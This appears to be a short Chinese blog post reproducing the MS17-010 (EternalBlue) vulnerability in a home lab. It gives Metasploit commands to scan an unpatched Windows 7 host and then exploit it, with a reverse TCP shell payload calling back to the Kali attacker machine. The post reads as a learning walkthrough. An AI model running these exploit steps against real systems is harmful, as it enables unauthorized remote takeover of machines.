[漏洞复现]ms17-010(永恒之蓝)复现

复现环境

  • 攻击机:在这里插入图片描述kali(192.168.1.105)
  • 靶机:win7官方原版镜像(192.168.1.103)445端口开放,且没打补丁

nmap针对靶机的扫描结果
[漏洞复现]ms17-010(永恒之蓝)复现_第1张图片

复现

  • 在kali终端打开metasploit
msfconsole

在这里插入图片描述

  • 搜索ms17-010相关模块
search ms17-010

[漏洞复现]ms17-010(永恒之蓝)复现_第2张图片

  • 利用上图框出来的模块,进行漏洞发现
    这个模块就是一个ms17-010漏洞扫描模块,利用它可以确定目标是否存在该漏洞
use auxiliary/scanner/smb/smb_ms17_010
  • 查看需要配置哪些参数
show options

[漏洞复现]ms17-010(永恒之蓝)复现_第3张图片
由此可见,我们需要配置rhosts这个参数,这个参数就是你即将扫描的网段,当然,如果只有一个主机需要扫描,就只给出这个主机ip就行了。

  • 设置ip地址
set rhosts 192.168.1.103
  • 启用扫描
exploit

[漏洞复现]ms17-010(永恒之蓝)复现_第4张图片
如果结果中出现加号开头的,就说明那个主机存在该漏洞啦

接下来我们使用漏洞利用模块来进行getshell

1.选择模块
use exploit/windows/smb/ms17_010_eternalblue
2.选择payload
set payload generic/shell_reverse_tcp
3.设置rhost(靶机ip)
set rhost 192.168.1.103
4.设置lhost(攻击机ip)
set lhost 192.168.1.105
5.实施攻击
exploit

[漏洞复现]ms17-010(永恒之蓝)复现_第5张图片
成功getshell

你可能感兴趣的:(Web安全)